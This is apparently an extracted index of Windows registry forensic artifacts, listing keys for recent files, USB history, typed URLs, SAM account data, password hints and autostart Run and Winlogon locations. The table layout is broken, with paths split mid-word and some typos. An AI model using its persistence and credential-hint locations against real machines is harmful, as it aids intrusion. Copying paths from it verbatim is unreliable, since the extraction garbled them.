[Link]\Software\Microsoft
\ office\version\ Common\Open
Find\ Microsoft Office
Outlook Recent Outlook\Settings\Save
Attachments Attachment\File Name MRU
HKEY_USERS\(User_ID)\Software
X \Microsoft\Office\Outlook\OMI
Outlook Settings P Account Manager\Accounts\
[Link]\Software\Microsoft
Outlook Temporary \Office\version\ Outlook\Secu
Attachment Directory rity
SYSTEM\ControlSet###\Control\
X 1 Session Manager\Memory
Pagefile Control P 7 8 0 Management
SYSTEM\ControlSetXXX\Control\
Session Manager\Memory
Pagefile Settings 7 Management

397
 [Link]\Software\Microsoft
\Windows\CurrentVersion\Apple
Paint MRU 7 ts\Paint\Recent File List
[Link]\Software\Microsoft
X 1 \ Windows\CurrentVersion\Appl
Paint MRU List P 7 8 0 ets\ Paint\Recent File List
SYSTEM\ControlSet001\Control\
1 DeviceClasses\{f33fdc04-
PAP Device Interface 7 8 0 d1ac-4e8e- 9a30-19bbd4b108ae}
Partition Management X 1 SYSTEM\ControlSet001\services
Driver Service P 7 8 0 \ partmgr\Enum
SOFTWARE\Software\Microsoft\
1 Windows\CurrentVersion\ Authe
Password Face Enabled 0 ntication\LogonUI\FaceLogon\
SOFTWARE\Software\Microsoft\
Windows\CurrentVersion\ Authe
Password Fingerprint 1 ntication\LogonUI\ Fingerprin
Enabled 8 0 tLogon\
SAM\Domains\Account\Users\\F_
Password Hint 7 Value\UserPasswordHint
X SOFTWARE\Microsoft\Windows\ C
Password Hint XP P urrentVersion\Hints\
SOFTWARE\Software\Microsoft\
Windows\CurrentVersion\ Authe
Password Picture 1 ntication\LogonUI\PicturePass
Gesture 8 0 word\/ bgPath
SOFTWARE\Software\Microsoft\
Windows\CurrentVersion\ Authe
1 ntication\LogonUI\ PINLogonEn
Password PIN Enabled 8 0 rollment\
Passwords Cached
Logon Password X SOFTWARE\Microsoft\Windows
Maximum P NT\ CurrentVersion\Winlogon
PCI Bus Device
Information 7 SYSTEM\ControlSet###\Enum\PCI
PCI Bus Device X 1
Information P 7 8 0 SYSTEM\ControlSet###\Enum\PCI
X 1 SYSTEM\ControlSet001\Enum\ PC
PCI Enumeration P 7 8 0 I\\
Photos App Associated 1
User 0 [Link]\LocalState\OD\
NTUSER\SOFTWARE\Microsoft\Off
1 ice\15.0\Word\User
Place MRU 0 MRU\LiveId#>\Place MRU
[Link]\Software\Microsoft
X \Internet Account
POP3 Passwords P Manager\Accounts\0000000#
[Link]\Software\Microsoft
X \ Internet Account
POP3 Passwords P Manager\Accounts\ 0000000#

398
Portable Operating 1 SYSTEM\ControlSet001\Control
System Drive 8 0 / PortableOperatingSystem
[Link]\Software\Microsoft
PowerPoint 2007 \Office\12.0\PowerPoint\Resil
Autosave Info 7 iency\DocumentRecovery\
[Link]\Software\Microsoft
\Office\12.0\PowerPoint\File
PowerPoint 2007 MRU 7 MRU
HKEY_LOCAL_MACHINE\Software\M
icrosoft\Windows\CurrentVersi
Pre-Logon Access on\Authentication\PLAP
Provider Providers\*
HKEY_LOCAL_MACHINE\Software\W
ow6432Node\Microsoft\Windows\
Pre-Logon Access CurrentVersion\Authentication
Provider \PLAP Providers\*
SYSTEM\ControlSet###\Control\
Session Manager\Memory
Management\PrefetchParameters
Prefetch Information 7 \EnablePrefetcher
[Link]\Software\Microsoft
\ Windows
X 1 NT\CurrentVersion\Windows\ De
Printer Default P 7 8 0 vices
X 1 [Link]\printers\DevModesP
Printer Default P 7 8 0 er User and DevModes#
SYSTEM\ControlSet###\Control\
Print\Environments\WindowsNTx
Printer Information 7 86\Drivers\Version#
Printer Properties SOFTWARE\Microsoft\Windows
for Installed X 1 NT\ CurrentVersion\Print\Prin
Printers P 7 8 0 ters\
SOFTWARE\Microsoft\Windows
Product ID 7 NT\CurrentVersion\ProductId
SOFTWARE\Microsoft\Windows
Product Name 7 NT\CurrentVersion\ProductName
SOFTWARE\\Microsoft\Windows
X 1 NT\ CurrentVersion\ProfileLis
Profile list P 7 8 0 t
[Link]\Software\Microsoft
Program Compatibility \Windows
Assistant (PCA) NT\CurrentVersion\AppCompatFl
Archive for Apps 8 ags\Layers
[Link]\Software\Microsoft
Program Compatibility \ Windows
Assistant NT\CurrentVersion\ AppCompatF
(PCA)Tracking of User 1 lags\Compatibility
Launched Applications 8 0 Assistant\Store

399
 SOFTWARE\Software\Microsoft\
Program Compatibility Windows
Assistant Archive for NT\CurrentVersion\AppCompatFl
Apps 7 ags\Layers
[Link]\Software\Microsoft
\Office\12.0\Publisher\Recent
Publisher 2007 MRU 7 File List
NTUSER\SOFTWARE\Microsoft\Off
1 ice\15.0\Word\Reading
Reading Locations 0 Locations
ReadyBoost SOFTWARE\Microsoft\Windows
Attachments 7 NT\CurrentVersion\EMDMgmt\
ReadyBoost
Attachments, USB 1 SOFTWARE\Microsoft\Windows
Identification 7 8 0 NT\ CurrentVersion\ EMDMgmt\
1 SYSTEM\ControlSet001\services
ReadyBoost Driver 8 0 \ rdyboost\Enum
[Link]\SOFTWARE\Microsoft
1 \Windows\CurrentVersion\Explo
Recent Docs 0 rer\RecentDocs\.&input=
[Link]\Software\Microsoft
Recent Docs MRU X 1 \ Windows\ CurrentVersion\Exp
Recent Documents P 7 8 0 lorer\ RecentDocs\
HKEY_CURRENT_USER\Software\Mi
crosoft\Windows\CurrentVersio
Recent Documents 7 n\Explorer\RecentDocs
HKEY_
CURRENT_USER\Software\Microso
ft\Windows\CurrentVersion\Exp
Recent Documents lorer\ComDlg32\OpenSaveMRU
[Link]\Software\Microsoft
1 \Windows\Current
RecentApps 0 Version\Search\RecentApps
[Link]\SOFTWARE\Microsoft
1 \Windows\CurrentVersion\Explo
RecentDocs 0 rer\RecentDocs
[Link]\SOFTWARE\Microsoft
1 \Windows\CurrentVersion\Explo
RecentDocs 0 rer\RecentDocs\.iso
[Link]\SOFTWARE\Microsoft
1 \Windows\CurrentVersion\Explo
RecentDocs 0 rer\RecentDocs\.vhd
NTUSER\SOFTWARE\Microsoft\Win
1 dows\CurrentVersion\Explorer\
RecentDocs for .jpg 0 RecentDocs\.jpg
[Link]\SOFTWARE\Microsoft
1 \Windows\CurrentVersion\Explo
RecentDocs for .jpg 0 rer\RecentDocs\.jpg&ls=0&b=0

400
 [Link]\Software\Microsoft
1 \Windows\CurrentVersion\Explo
Recycle Bin Info 0 rer\BitBucket\Volume\
[Link]\Software\Microsoft
1 \ Windows\CurrentVersion\Expl
Recycle Bin Info 7 8 0 orer\ BitBucket\Volume\
SOFTWARE\Microsoft\Windows\ C
X urrentVersion\Explorer\BitBuc
Recycle Bin Info XP P ket\
References devices,
services, drivers
enabled for Safe HKLM\System\CurrentControlSet
Mode. \Control\SafeBoot
[Link]\Software\Microsoft
X 1 \ Windows\ CurrentVersion\ Ap
Regedit - Favorites P 7 8 0 plets\Regedit\ Favorites
[Link]\Software\Microsoft
Regedit - Last Key X 1 \ Windows\CurrentVersion\Appl
Saved P 7 8 0 ets\ Regedit / LastKey
[Link]\Software\Microsoft
Regedit Last Key 1 \Windows\CurrentVersion\Apple
Saved 0 ts\Regedit\LastKey
[Link]\SOFTWARE\Microsoft
1 \Windows\CurrentVersion\Explo
[Link] search 0 rer\FileExts / .com
Registered 1 SOFTWARE\RegisteredApplicatio
Applications 7 8 0 ns /
SOFTWARE\Microsoft\Windows
Registered NT\CurrentVersion\RegisteredO
Organization 7 rganization
SOFTWARE\Microsoft\Windows
NT\CurrentVersion\RegisteredO
Registered Owner 7 wner
HKLM\System\CurrentControlSet
\Control\Session
Registry Windows 7 32 Manager\AppCompatCache\AppCom
Bit Shim Cache 7 patCache
Registry Windows
7 List Mounted
Devices 7 HKLM\System\MountedDevices\
Registry Windows HKLM\System\CurrentControlSet
7 Network Adapter \Services\Tcpip\Parameters\In
Configuration 7 terfaces\(interface-name)\
Registry Windows HKLM\Software\Microsoft\Windo
7 Network List wsNT\CurrentVersion\NetworkLi
Profiles 7 st\Profiles\{GUID}\
Registry Windows 7 HKLM\Software\Microsoft\Windo
List Applications ws\CurrentversionXUninstall\{
Installed 7 Application. Name)

401
Registry Windows 7
Security Audit
Policies 7 HKLM\Security\Policy
Registry Windows 7 HKLM\System\CurrentControlSet
Time Zone Information 7 \Control\TimeZonelnformation
HKLM\Software\Microsoft\Windo
Registry Windows 7 wsNT\CurrentVersion\ProfileLi
User Profile Logon 7 st\{SID}\
HKLM\SOFTWARE\Microsoft\Windo
ws
Registry Windows 7 NT\CurrentVersion\Winlogon\Sh
Winlogon shell 7 ell
SYSTEM\ControlSet###\Control\
X 1 Terminal Server /
Remote Desktop P 7 8 0 fDenyTSConnections
SYSTEM\ControlSet###\Control\
Remote Desktop Terminal
Information 7 Server\fDenyTSConnections
Roaming Identities
(1125 PowerPoint, [Link]\SOFTWARE\Microsoft
1133 Word, 1141 1 \Office\15.0\Common\Roaming\I
Excel) 0 dentities\\
[Link]\Software\Microsoft
Run Box Recent \Windows\CurrentVersion\Explo
commands 7 rer\RunMRU
[Link]\Software\Microsoft
X 1 \ Windows\CurrentVersion\Expl
Run MRU P 7 8 0 orer\ RunMRU
[Link]\SOFTWARE\Microsoft
1 \Windows\CurrentVersion\Run /
Run subkey - Active 0 OneDrive
X 1 [Link]\Software\Microsoft
Run, Startup P 7 8 0 \ Windows\CurrentVersion\Run
[Link]\Control
Panel\Desktop/ScreenSaveActiv
Screen Saver Enabled 7 e
[Link]\Control
X 1 Panel\Desktop /
Screen Saver Enabled P 7 8 0 ScreenSaveActive
[Link]\Control
Screen Saver Password Panel\Desktop/ScreenSaverIsSe
Enabled 7 cure
[Link]\Control
Screen Saver Secure X 1 Panel\Desktop /
Password Enabled P 7 8 0 ScreenSaverIsSecure
[Link]\Control
Panel\Desktop/ScreenSaveTimeO
Screen Saver Timeout 7 ut

402
 [Link]\Control
X 1 Panel\Desktop /
Screen Saver Timeout P 7 8 0 ScreenSaveTimeOut
Screen Saver [Link]\Control
Wallpaper 7 Panel\Desktop/WallPaper
Screen Savers and X 1 [Link]\Control
Wallpaper P 7 8 0 Panel\Desktop\
SCSI Device SYSTEM\ControlSet###\Enum\SCS
Information 7 I
SCSI Device X 1 SYSTEM\ControlSet###\Enum\SCS
Information P 7 8 0 I
1 SYSTEM\ControlSet001\Enum\ SC
SCSI Enumeration 7 8 0 SI\\
[Link]\Software\Microsoft
\ Windows\CurrentVersion\Expl
orer\ SearchHistory\DefaultBr
Search Charm Entries owser_
for Internet NOPUBLISHERID![Link]
Addresses and Sites net Explorer. Default
[Link]\Software\Microsoft
1 \Windows\CurrentVersion\Explo
Search WordWheelQuery 7 0 rer\WordWheelQuery
Serial Port Device SYSTEM\ControlSet###\Enum\SER
Information 7 ENUM
X 1
Services P 7 8 0 SYSTEM\ControlSet###\Services
Services List 7 SYSTEM\ControlSet###\Services
HKEY_LOCAL_MACHINE\System\Cur
Session Manager rentControlSet\Control\Sessio
Execute n Manager
[Link]\SOFTWARE\Microsoft
Shared data to: e- 1 \Windows\CurrentVersion\Explo
mail 0 rer\SharingMFU
Shared Folders, X 1 SYSTEM\ControlSet###\Services
Shared Printers P 7 8 0 \ LanmanServer\ Shares /
[Link]\SOFTWARE\Microsoft
1 \Windows\CurrentVersion\Explo
Shared Photos 0 rer\SharingMFU
[Link]\SOFTWARE\Microsoft
1 \Windows\CurrentVersion\Explo
Shared photos 0 rer\SharingMFU
[Link]\Software\Microsoft
1 \ Windows\CurrentVersion\Expl
Sharing MFU 0 orer\ SharingMFU
1 [Link]\SOFTWARE\Microsoft
Shell Bags 0 \Windows\Shell\Bags\1\Desktop
[Link]\Local\Settings\S
1 oftware\ Microsoft\Windows\Sh
Shell Bags 7 8 0 ell\Bags

403
 [Link]\Software\Microsoft
1 \ Windows\Shell\Bags\1\Deskto
Shell Bags 7 8 0 p
[Link]\Local\Settings\S
oftware\ Microsoft\Windows\Sh
Shell Bags ell\BagMRU
HKEY_LOCAL_MACHINE\Software\M
icrosoft\Windows\CurrentVersi
on\Explorer\ShellExecuteHooks
Shell Execute Hooks \*
HKEY_LOCAL_MACHINE\Software\W
ow6432Node\Microsoft\Windows\
CurrentVersion\Explorer\Shell
Shell Execute Hooks ExecuteHooks\*
HKEY_LOCAL_MACHINE\Software\M
icrosoft\Windows\CurrentVersi
Shell Extensions on\Shell Extensions\Approved
HKEY_LOCAL_MACHINE\Software\W
ow6432Node\Microsoft\Windows\
CurrentVersion\Shell
Shell Extensions Extensions\Approved
HKEY_USERS\%SID%\Software\Mic
rosoft\Windows\CurrentVersion
Shell Extensions \Shell Extensions\Approved
HKEY_USERS\%SID%\Software\Wow
6432Node\Microsoft\Windows\Cu
rrentVersion\Shell
Shell Extensions Extensions\Approved
HKEY_CURRENT_USER\Software\Mi
crosoft\Windows
Shell Load and Run NT\CurrentVersion\Windows
HKEY_CURRENT_USER\Software\Wo
w6432Node\Microsoft\Windows
Shell Load and Run NT\CurrentVersion\Windows
X [Link]\Software\Microsoft
ShellBags P \ Windows\Shell\ BagMRU
X [Link]\Software\Microsoft
ShellBags P \ Windows\Shell\ Bags
[Link]\Software\Microsoft
X \ Windows\Shell\ShellNoRoam\
ShellBags P BagMRU
[Link]\Software\Microsoft
X \ Windows\Shell\ShellNoRoam\B
ShellBags P ags
HKLM\SYSTEM\CurrentControlSet
X \Control\SessionManager\AppCo
Shim Cache P mpatibility\AppCompatCache
SYSTEM\CurrentControlSet\Cont
X rol\SessionManager\AppCompati
Shimcache P bility

404
 SYSTEM\CurrentControlSet\Cont
1 rol\Session
Shimcache 7 8 0 Manager\AppCompatCache
SYSTEM\ControlSetXXX\Control\
Shutdown Time 7 Windows\ShutdownTime
X 1 SYSTEM\ControlSet###\Control\
Shutdown Time P 7 8 0 Windows / ShutdownTime
SkyDrive E-Mail [Link]\LocalState\Platf
Account Name 8 orm
SkyDrive User Name 8 [Link]\RoamingState
HKEY_CLASSES_ROOT\Activatable
Classes\Package\[Link]
1 peApp_3.2.1.0_x86__kzf8qxf38z
Skype App Install 0 g5c
HKEY_LOCAL_MACHINE\SOFTWARE\C
1 lasses\MIME\Database\Content
Skype Assoc. Files 1 0 Type\application/x-skype
1 HKEY_LOCAL_MACHINE\SOFTWARE\C
Skype Assoc. Files 2 0 lasses\.skype
1 HKEY_CURRENT_USER\SOFTWARE\Cl
Skype Assoc. Files 3 0 asses\.skype
1
Skype Assoc. Files 4 0 HKEY_CLASSES_ROOT\.skype
HKEY_CURRENT_USER\Software/SK
YPE/PHONE/LIB/Connection/HOST
Skype Cached IP Data CACHE
1 HKEY_CURRENT_USER\SOFTWARE\Sk
Skype Install Path 0 ype\Phone
1 HKEY_CLASSES_ROOT\AppX(Random
Skype Installation 0 Value)
1 HKEY_CURRENT_USER\SOFTWARE\Sk
Skype Language 0 ype\Phone\UI\General
1 HKEY_LOCAL_MACHINE\SOFTWARE\I
Skype Process Name 0 M Providers\Skype
HKEY_CLASSES_ROOT\AppID\{27E6
1 D007-EE3B-4FF7-8AE8-
Skype Update App ID 0 28EF0739124C}
[Link]\LocalState /
Skype User CID 8 [Link]
1 HKEY_CURRENT_USER\SOFTWARE\Sk
Skype User List 0 ype\Phone\Users\
Skype User Name E- [Link]\LocalState /
Mail [Link]
HKEY_LOCAL_MACHINE\SOFTWARE\M
icrosoft\Windows\CurrentVersi
1 on\Installer\UserData\S-1-5-
Skype Version 1 0 18\Components\(UID)\(UID)
HKEY_CLASSES_ROOT\Installer\P
1 roducts\74A569CF9384AC046B818
Skype Version 2 0 14F680F246C

405
 SOFTWARE\Microsoft\WindowsNT\
CurrentVersion\SRUM\Extension
s {d10ca2fe-6fcf-4f6d-848e-
b2e99266fa89} = Application
Resource Usage Provider
SRUM C:\Windows\System32\SRU\
SOFTWARE\Microsoft\WindowsNT\
SRUM Resource Usage 1 CurrentVersion\SRUM\Extension
History 7 8 0 s
Start and File [Link]\Software\Microsoft
Explorer Searches 1 \ Windows\ CurrentVersion\Exp
entered by user 7 8 0 lorer\ WordWheelQuery
[Link]\Software\Microsoft
Start Menu Program \ Windows\CurrentVersion\Expl
List orer\ MenuOrder\ Programs\
[Link]\Software\Microsoft
Start Searches \Windows\CurrentVersion\Explo
Entered by User 7 rer\WordWheelQuery
Start Searches [Link]\Software\Microsoft
entered by user \ SearchAssistant\ ACMru\5###
X 1 SOFTWARE\Microsoft\Command
Startup Location P 7 8 0 Processor / AutoRun
SOFTWARE\Microsoft\Windows
X 1 NT\ CurrentVersion\Winlogon/U
Startup Location P 7 8 0 serinit
X 1 SYSTEM\ControlSet###\Control\
Startup Location P 7 8 0 SessionManager\BootExecute
[Link]\Software\Microsoft
X 1 \ Windows\CurrentVersion\RunO
Startup Software P 7 8 0 nce
X 1 SOFTWARE\Microsoft\Windows\ C
Startup Software Run P 7 8 0 urrentVersion\Run
Startup Software Run X 1 SOFTWARE\\Microsoft\Windows\
Once P 7 8 0 CurrentVersion\RunOnce
SYSTEM\ControlSet001\Control\
X 1 DeviceClasses\ {53f56307-
Storage Class Drivers P 7 8 0 b6bf-11d0- 94f2-00a0c91efb8b}
Storage Device X 1 SYSTEM\ControlSet###\Enum\ ST
Information P 7 8 0 ORAGE
X 1 SYSTEM\ControlSet001\Enum\ ST
STORAGE Enumeration P 7 8 0 ORAGE\Volume\\
Storage Spaces Drive 1 SYSTEM\ControlSet###\Services
ID 8 0 \ spaceport\Parameters
SOFTWARE\Microsoft\Windows
X 1 NT\ CurrentVersion\ SystemRes
System Restore Info P 7 8 0 tore
System Restore SOFTWARE\Microsoft\WindowsNT\
Information 7 CurrentVersion\SystemRestore
TaskBar Application 1 [Link]\SOFTWARE\Microsoft
List 0 \Windows\CurrentVersion\Explo

406
 rer\Taskband /
FavoritesResolve
TCPIP Data, Domain SYSTEM\ControlSet###\Services
Names, Internet X 1 \ Tcpip\Parameters\Interfaces
Connection Info P 7 8 0 \
SYSTEM\ControlSet###\Services
X 1 \ Tcpip\Parameters\Interfaces
TCPIP Network Cards P 7 8 0 \
[Link]\Software\TechSmith
TechSmith SnagIt MRU \ SnagIt\\Recent Captures
[Link]\Software\Microsoft
X 1 \ Windows\CurrentVersion\Them
Theme Current Theme P 7 8 0 es / CurrentTheme
[Link]\Software\Microsoft
\ Windows\CurrentVersion\Them
Theme Last Theme es\ Last Theme
Time Sync with SOFTWARE\Microsoft\Windows\Cu
Internet Servers 7 rrentVersion\DateTime\Servers
SOFTWARE\Microsoft\Windows\ C
Time Synch with X 1 urrentVersion\DateTime\Server
Internet Choices P 7 8 0 s
Time Synch with X 1 SYSTEM\ControlSet###\Services
Internet Enabled P 7 8 0 \ W32Time\Parameters / Type
SOFTWARE\Microsoft\Windows\ C
Time Synch with X 1 urrentVersion\DateTime\Server
Internet Servers P 7 8 0 s
X 1 SYSTEM\ControlSet###\Control\
Time Zone Information P 7 8 0 TimeZoneInformation
NTUSER\SOFTWARE\Microsoft\Off
1 ice\15.0\Word\Security\Truste
Trusted Documents 0 d Documents\TrustRecords
NTUSER\SOFTWARE\Microsoft\Off
1 ice\15.0\Word\Security\Truste
Trusted Locations 0 d Locations
SOFTWARE\Microsoft\Widows\Cur
rentVersion\Policies\System\C
Turn off UAC Behavior 7 onsentPromptBehaviorAdmin
SOFTWARE\Microsoft\Windows\ C
1 urrentVersion\Policies\System
Turn off UAC Behavior 7 8 0 / ConsentPromptBehaviorAdmin
[Link]\Software\Microsoft
Typed Paths in \Windows\CurrentVersion\Explo
Windows Explorer 7 rer\TypedPaths
Typed Paths into [Link]\Software\Microsoft
Windows Explorer or 1 \ Windows\CurrentVersion\Expl
File Explorer 7 8 0 orer\ TypedPaths
[Link]\SOFTWARE\LocalSe
ttings\Software\Microsoft\Win
1 dows\CurrentVersion\AppContai
TypedURLs 0 ner\ Storage\[Link]

407
 oftedge_8wekyb3d8bbwe\Microso
ftEdge\TypedURLs
1 [Link]\SOFTWARE\Microsoft
TypedURLs 0 \Internet Explorer\TypedURLs
1 [Link]\SOFTWARE\Microsoft
TypedURLs Hyperlink 0 \Internet Explorer\TypedURLs
[Link]\SOFTWARE\LocalSe
ttings\Software\Microsoft\Win
dows\CurrentVersion\AppContai
ner\ Storage\[Link]
1 oftedge_8wekyb3d8bbwe\Microso
TypedURLsTime 0 ftEdge\TypedURLs
[Link]\SOFTWARE\Microsoft
1 \Internet
TypedURLsTime 0 Explorer\TypedURLsTime
[Link]\SOFTWARE\LocalSe
ttings\Software\Microsoft\Win
dows\CurrentVersion\AppContai
ner\ Storage\[Link]
1 oftedge_8wekyb3d8bbwe\Microso
TypedURLsVisitCount 0 ftEdge\TypedURLsVisitCount
SOFTWARE\Microsoft\Windows\Cu
rrentVersion\Policies\System\
UAC On or Off EnableLUA
SOFTWARE\Microsoft\Windows\ C
1 urrentVersion\Policies\System
UAC On or Off 7 8 0 / EnableLUA
SYSTEM\ControlSet001\ Control
UMB Bus Driver 1 \DeviceClasses\{65a9a6cf-
Interface 7 8 0 64cd-480b-843e-32c86e1ba19f}
SYSTEM\ControlSet###\Control\
DeviceClasses\{53f56307-b6bf-
X 1 11d0- 94f2-00a0c91efb8b}\/
USB Device Classes P 7 8 0 DeviceInstance
SYSTEM\ControlSet###\Control\
1 Device
USB Device Containers 8 0 Containers\\ BaseContainers\
USB Device 1 SYSTEM\ControlSet001\Enum\USB
Information Values 7 8 0 \\
SYSTEM\ControlSet001\ Control
X 1 \DeviceClasses\{a5dcbf10-
USB Device Interface P 7 8 0 6530-11d2-901f-00c04fb951ed}
X 1
USB Enumeration P 7 8 0 SYSTEM\ControlSet001\Enum\USB
SYSTEM\ControlSet###\Enum\ US
BSTOR\\\ Properties\{83da6326
-97a6-4088-9453-
USB First Install 1 a1923f573b29}\00000064\000000
Date 7 8 0 00/ Data

408
 SYSTEM\ControlSet###\Enum\ US
BSTOR\\\ Properties\{83da6326
-97a6-4088-9453-
1 a1923f573b29}\00000065\000000
USB Install Date 7 8 0 00/ Data
SYSTEM\ControlSet###\Enum\ US
BSTOR\\\ Properties\{83da6326
1 -97a6-4088-9453-
USB Last Arrival Date 8 0 a1923f573b29}\0066
SYSTEM\ControlSet###\Enum\ US
BSOR\\\ Properties\ {83da6326
1 -97a6-4088-9453-
USB Last Removal Date 8 0 a1923f573b29}\0067
[Link]\Software\Microsoft
USB Logged On User at X 1 \ Windows\ CurrentVersion\Exp
Time of Access P 7 8 0 lorer\ MountPoints2\
USB ROM Descriptors HKEY_LOCAL_MACHINE\USBSTOR\
USB to Volume Serial SOFTWARE\Microsoft\WindowsNT\
Number 7 CurrentVersion\EMDMgmt
USB Windows Portable 1 SOFTWARE\Microsoft\Windows
Devices 7 8 0 Portable Devices\Devices
X 1 SYSTEM\ControlSet001\Enum\ US
USBPRINT P 7 8 0 BPRINT\\
X 1 SYSTEM\ControlSet001\services
USBS Hub Information P 7 8 0 \ usbhub\Enum
1 SYSTEM\ControlSet###\Enum\ US
USBSTOR Container ID 7 8 0 BSTOR\\/ ContainerID
USBSTOR Drive X 1 SYSTEM\ControlSet###\Enum\ US
Identification P 7 8 0 BSTOR\\
X 1 SYSTEM\ControlSet###\Enum\ US
USBSTOR Enumeration P 7 8 0 BSTOR\\
USBSTOR Parent ID SYSTEM\ControlSet###\Enum\ US
Prefix (PIP) BSTOR\\/ ParentIdPrefix
User Account SAM\Domains\Account\Users\F
Expiration 7 Key
X 1 SAM\SAM\Domains\Account\Users
User Account Status P 7 8 0 \/ V
User Information F X 1 SAM\SAM\Domains\Account\Users
Value P 7 8 0 \/ F
User Information V X 1 SAM\SAM\Domains\Account\Users
Value P 7 8 0 \/ V
User Information X 1 SAM\SAM\Domains\Account\Users
Values P 7 8 0 \
1 SAM\SAM\Domains\Account\Users
User Live Accounts 8 0 \/ F
User Logon Account 1 SAM\SAM\Domains\Account\Users
Hidden on Startup 7 8 0 \/ UserDontShowInLogonUI
SOFTWARE\Microsoft\Windows
User Logon Account 1 NT\CurrentVersion\Winlogon\ S
Hidden on Startup 7 8 0 pecialAccounts\UserList /

409
User Mode Bus 1 SYSTEM\ControlSet001\services
Enumerator V 7 8 0 \ umbus\Enum
SOFTWARE\Microsoft\Windows
X 1 NT\ CurrentVersion\ProfileLis
User Name and SID P 7 8 0 t\
1 SAM\SAM\Domains\Account\Users
User Password Hint V 8 0 \/ UserPasswordHint
SOFTWARE\Microsoft\Windows
X NT\ CurrentVersion\ProfileLis
User Password Hint XP P t\
[Link]\Software\Microsoft
X \ Windows\ CurrentVersion\Exp
UserAssist P lorer\ UserAssist\
[Link]\Software\Microsoft
1 \ Windows\CurrentVersion\Expl
UserAssist 7 8 0 orer\ UserAssist\
[Link]\Software\Microsoft
\Windows\Currentversion\Explo
UserAssist rer\UserAssist\{GUID}\Coun
UsrClass Info HKEY_USERS\_Classes
[Link]\Software\VMware,
Inc.\VMWare
VMware Player Recents Player\VMplayer\Window
List position
HKLM\SYSTEM\ControlSet001\ Co
ntrol\Device
Volume Device X 1 Classes\{53f5630d- b6bf-11d0-
Interface Class P 7 8 0 94f2-00a0c91efb8b}
Volume Shadow Copy X 1 SYSTEM\ControlSet001\services
service driver P 7 8 0 \ volsnap\Enum
HKEY_USERS\(SID)\Software\Azu
Vuze Install Path 1 7 reus
HKEY_LOCAL_MACHINE\SOFTWARE\A
Vuze Install Path 2 7 zureus
HKEY_LOCAL_MACHINE\SOFTWARE\e
j-
technologies\install4j\instal
lations\allinstdirs8461-7759-
Vuze Install4j 7 5462-8226
HKEY_USERS\(SID)\Software\ej-
Vuze install4jprogram 7 technologies\exe4j\pids
HKEY_LOCAL_MACHINE\SOFTWARE\e
j-
technologies\install4j\instal
lations\instdir8461-7759-
Vuze Installer 7 5462-8226
[Link]\Software\Microsoft
Windows Explorer \Windows\CurrentVersion\Explo
Settings 7 rer\Advanced

410
 [Link]\Software\Microsoft
Windows Explorer X 1 \ Windows\CurrentVersion\Expl
Settings P 7 8 0 orer\ Advanced
Windows Portable 1 SOFTWARE\Microsoft\Windows
Devices 7 8 0 Portable Devices\Devices\
HKEY_LOCAL_MACHINE\System\Cur
WindowsBootVerificati rentControlSet\Control\BootVe
onProgram rificationProgram
HKEY_LOCAL_MACHINE\Software\M
icrosoft\Windows\CurrentVersi
WindowsRunKeys on\Policies\Explorer\Run\*
HKEY_LOCAL_MACHINE\Software\M
icrosoft\Windows\CurrentVersi
WindowsRunKeys on\Run\*
HKEY_LOCAL_MACHINE\Software\M
icrosoft\Windows\CurrentVersi
WindowsRunKeys on\RunOnce\*
HKEY_LOCAL_MACHINE\Software\M
icrosoft\Windows\CurrentVersi
WindowsRunKeys on\RunOnce\Setup\*
HKEY_LOCAL_MACHINE\Software\M
icrosoft\Windows\CurrentVersi
WindowsRunKeys on\RunOnceEx\*
HKEY_LOCAL_MACHINE\Software\W
ow6432Node\Microsoft\Windows\
WindowsRunKeys CurrentVersion\Run\*
HKEY_LOCAL_MACHINE\Software\W
ow6432Node\Microsoft\Windows\
WindowsRunKeys CurrentVersion\RunOnce\*
HKEY_LOCAL_MACHINE\Software\W
ow6432Node\Microsoft\Windows\
CurrentVersion\RunOnce\Setup\
WindowsRunKeys *
HKEY_LOCAL_MACHINE\Software\W
ow6432Node\Microsoft\Windows\
WindowsRunKeys CurrentVersion\RunOnceEx\*
HKEY_LOCAL_MACHINE\Software\W
ow6432Node\Microsoft\Windows\
CurrentVersion\Policies\Explo
WindowsRunKeys rer\Run\*
HKEY_USERS\%SID%\Software\Mic
rosoft\Windows\CurrentVersion
WindowsRunKeys \Policies\Explorer\Run\*
HKEY_USERS\%SID%\Software\Mic
rosoft\Windows\CurrentVersion
WindowsRunKeys \Run\*
HKEY_USERS\%SID%\Software\Mic
rosoft\Windows\CurrentVersion
WindowsRunKeys \RunOnce\*

411
 HKEY_USERS\%SID%\Software\Mic
rosoft\Windows\CurrentVersion
WindowsRunKeys \RunOnce\Setup\*
HKEY_USERS\%SID%\Software\Mic
rosoft\Windows\CurrentVersion
WindowsRunKeys \RunOnceEx\*
HKEY_USERS\%SID%\Software\Wow
6432Node\Microsoft\Windows\Cu
rrentVersion\Policies\Explore
WindowsRunKeys r\Run\*
HKEY_USERS\%SID%\Software\Wow
6432Node\Microsoft\Windows\Cu
WindowsRunKeys rrentVersion\Run\*
HKEY_USERS\%SID%\Software\Wow
6432Node\Microsoft\Windows\Cu
WindowsRunKeys rrentVersion\RunOnce\*
HKEY_USERS\%SID%\Software\Wow
6432Node\Microsoft\Windows\Cu
WindowsRunKeys rrentVersion\RunOnce\Setup\*
HKEY_USERS\%SID%\Software\Wow
6432Node\Microsoft\Windows\Cu
WindowsRunKeys rrentVersion\RunOnceEx\*
HKEY_LOCAL_MACHINE\Software\M
icrosoft\Windows\CurrentVersi
WindowsRunServices on\RunServicesOnce\*
HKEY_LOCAL_MACHINE\Software\M
icrosoft\Windows\CurrentVersi
WindowsRunServices on\RunServices\*
HKEY_LOCAL_MACHINE\Software\W
ow6432Node\Microsoft\Windows\
CurrentVersion\RunServicesOnc
WindowsRunServices e\*
HKEY_LOCAL_MACHINE\Software\W
ow6432Node\Microsoft\Windows\
WindowsRunServices CurrentVersion\RunServices\*
HKEY_LOCAL_MACHINE\Software\M
WindowsSystemPolicySh icrosoft\Windows\CurrentVersi
ell on\Policies\System
HKEY_LOCAL_MACHINE\Software\W
ow6432Node\Microsoft\Windows\
WindowsSystemPolicySh CurrentVersion\Policies\Syste
ell m
HKEY_LOCAL_MACHINE\Software\M
icrosoft\Windows
NT\CurrentVersion\Winlogon\No
WindowsWinlogonNotify tify\*
HKEY_USERS\%SID%\Software\Mic
rosoft\Windows
NT\CurrentVersion\Winlogon\No
WindowsWinlogonNotify tify\*

412
 HKEY_LOCAL_MACHINE\Software\M
icrosoft\Windows
WindowsWinlogonShell NT\CurrentVersion\Winlogon
HKEY_USERS\%SID%\Software\Mic
rosoft\Windows
